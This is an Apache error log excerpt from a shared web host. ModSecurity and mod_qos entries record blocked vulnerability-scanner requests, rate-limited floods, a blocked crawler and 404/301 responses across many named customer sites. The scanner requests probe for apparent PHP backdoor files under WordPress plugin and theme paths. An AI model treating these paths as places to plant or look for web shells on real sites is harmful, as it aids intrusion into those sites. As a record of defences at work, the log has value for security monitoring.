[Tue May 26 19:59:18.106379 2026] [security2:error] [pid 93868:tid 94338] [client 45.92.1.17:59011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253sgAAAd8"]
[Tue May 26 19:59:18.110711 2026] [security2:error] [pid 93868:tid 94284] [client 45.92.1.17:58999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWuPkqK9k_ZUB2Vp253tAAAAak"]
[Tue May 26 19:59:18.112206 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztRAAAACc
[Tue May 26 19:59:18.116457 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253twAAAaA
[Tue May 26 19:59:18.119872 2026] [security2:error] [pid 93868:tid 94330] [client 45.92.1.17:58881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253uAAAAdc"], referer: www.google.com
[Tue May 26 19:59:18.122727 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253uQAAAcY
[Tue May 26 19:59:18.126875 2026] [security2:error] [pid 93868:tid 94312] [client 45.92.1.17:59024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253uwAAAcU"]
[Tue May 26 19:59:18.127491 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztRgAAAGQ
[Tue May 26 19:59:18.152321 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253wAAAAdg
[Tue May 26 19:59:18.187028 2026] [security2:error] [pid 93868:tid 94332] [client 45.92.1.17:58941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253wgAAAdk"], referer: www.google.com
[Tue May 26 19:59:18.192078 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253wwAAAgA
[Tue May 26 19:59:18.220181 2026] [security2:error] [pid 93868:tid 94362] [client 45.92.1.17:58957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/aoocuion.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253xwAAAfc"], referer: www.google.com
[Tue May 26 19:59:18.225344 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztTgAAACM
[Tue May 26 19:59:18.225833 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253ygAAAcM
[Tue May 26 19:59:18.229745 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztTwAAADc
[Tue May 26 19:59:18.257185 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztUAAAAD0
[Tue May 26 19:59:18.260153 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztUQAAAG0
[Tue May 26 19:59:18.264391 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253zAAAAZE
[Tue May 26 19:59:18.272635 2026] [security2:error] [pid 93576:tid 93839] [client 45.92.1.17:58076] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsjAAAAH8"], referer: www.google.com
[Tue May 26 19:59:18.273008 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253zQAAAeM
[Tue May 26 19:59:18.277082 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztUgAAAH4
[Tue May 26 19:59:18.277347 2026] [security2:error] [pid 93868:tid 94312] [client 92.222.104.200:64338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rakeshdewan.com"] [uri "/robots.txt"] [unique_id "ahWuPkqK9k_ZUB2Vp253zwAAAcU"]
[Tue May 26 19:59:18.277465 2026] [security2:error] [pid 93868:tid 94312] [client 92.222.104.200:64338] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rakeshdewan.com"] [uri "/robots.txt"] [unique_id "ahWuPkqK9k_ZUB2Vp253zwAAAcU"]
[Tue May 26 19:59:18.305798 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp2530QAAAgk
[Tue May 26 19:59:18.307678 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr-wAAAA8"]
[Tue May 26 19:59:18.311294 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsaQAAAEg"]
[Tue May 26 19:59:18.315652 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsOgAAAHg"]
[Tue May 26 19:59:18.318224 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2525wAAAc8"]
[Tue May 26 19:59:18.324384 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsVQAAAGE"]
[Tue May 26 19:59:18.326757 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2529AAAAZQ"]
[Tue May 26 19:59:18.328936 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2529QAAAbA"]
[Tue May 26 19:59:18.341249 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252bAAAAgw"]
[Tue May 26 19:59:18.365639 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsXgAAAA0"]
[Tue May 26 19:59:18.368175 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2523gAAAfI"]
[Tue May 26 19:59:18.385182 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2522AAAAbI"]
[Tue May 26 19:59:18.386881 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2526QAAAZ0"]
[Tue May 26 19:59:18.387538 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2522wAAAeo"]
[Tue May 26 19:59:18.388740 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPEqK9k_ZUB2Vp2529gAAAf0"]
[Tue May 26 19:59:18.403179 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsZAAAAAA"]
[Tue May 26 19:59:18.403972 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsRAAAABk"]
[Tue May 26 19:59:18.426326 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsYQAAAGk"]
[Tue May 26 19:59:18.426656 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs1QAAADg"]
[Tue May 26 19:59:18.434701 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253PgAAAbo"]
[Tue May 26 19:59:18.445909 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsbgAAABc"]
[Tue May 26 19:59:18.466245 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253UAAAAgg"]
[Tue May 26 19:59:18.470583 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsgwAAAE4"]
[Tue May 26 19:59:18.478261 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsXwAAACU"]
[Tue May 26 19:59:18.508857 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsaAAAAEI"]
[Tue May 26 19:59:18.549791 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs5wAAAB8"]
[Tue May 26 19:59:18.574667 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPmDRMqfxdEDkoszthQAAABs
[Tue May 26 19:59:18.580486 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkoszthgAAAEk
[Tue May 26 19:59:18.585214 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp2539wAAAdU
[Tue May 26 19:59:18.604843 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkoszthwAAADI
[Tue May 26 19:59:18.652442 2026] [security2:error] [pid 93868:tid 94270] [client 45.92.1.17:58927] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253pAAAAck"], referer: www.google.com
[Tue May 26 19:59:18.656895 2026] [security2:error] [pid 93576:tid 93727] [client 45.92.1.17:58354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuPmDRMqfxdEDkosztiQAAAA8"]
[Tue May 26 19:59:18.661689 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztigAAAF4
[Tue May 26 19:59:18.662166 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztiwAAABE
[Tue May 26 19:59:18.662472 2026] [security2:error] [pid 93868:tid 94281] [client 45.92.1.17:58958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253sAAAAaY"], referer: www.google.com
[Tue May 26 19:59:18.664144 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztjAAAACQ
[Tue May 26 19:59:18.676718 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztjQAAABc
[Tue May 26 19:59:18.683275 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253-AAAAbk
[Tue May 26 19:59:18.692699 2026] [security2:error] [pid 93576:tid 93734] [client 45.92.1.17:58344] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztbgAAABY"], referer: www.google.com
[Tue May 26 19:59:18.706511 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:35264] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253-gAAAeQ
[Tue May 26 19:59:18.730397 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp254AgAAAf4
[Tue May 26 19:59:18.730720 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztkAAAACo
[Tue May 26 19:59:18.741283 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp254AwAAAaw
[Tue May 26 19:59:18.767544 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztkgAAAHs
[Tue May 26 19:59:18.775742 2026] [security2:error] [pid 93576:tid 93803] [client 45.92.1.17:59021] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztRwAAAFs"], referer: www.google.com
[Tue May 26 19:59:18.804314 2026] [security2:error] [pid 93576:tid 93717] [client 45.92.1.17:58076] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahWuPmDRMqfxdEDkosztjgAAAAU"], referer: www.google.com
[Tue May 26 19:59:18.809800 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztlAAAAAM
[Tue May 26 19:59:18.811935 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztlQAAAAk
[Tue May 26 19:59:18.816391 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztlgAAADI
[Tue May 26 19:59:18.826352 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztmAAAACs
[Tue May 26 19:59:18.839529 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp254CQAAAbI
[Tue May 26 19:59:18.949649 2026] [security2:error] [pid 93576:tid 93740] [client 45.92.1.17:58674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkosztDAAAABw"], referer: www.google.com
[Tue May 26 19:59:18.982221 2026] [security2:error] [pid 93868:tid 94265] [client 45.92.1.17:58008] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253pgAAAZY"], referer: www.google.com
[Tue May 26 19:59:19.156808 2026] [security2:error] [pid 93868:tid 94272] [client 45.92.1.17:58927] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWuPkqK9k_ZUB2Vp254DQAAAZ0"], referer: www.google.com
[Tue May 26 19:59:19.213891 2026] [security2:error] [pid 93868:tid 94299] [client 45.92.1.17:58958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWuP0qK9k_ZUB2Vp254FAAAAbg"], referer: www.google.com
[Tue May 26 19:59:19.276074 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs6QAAAAE"]
[Tue May 26 19:59:19.282780 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsWwAAABQ"]
[Tue May 26 19:59:19.299132 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszs6wAAAHM"]
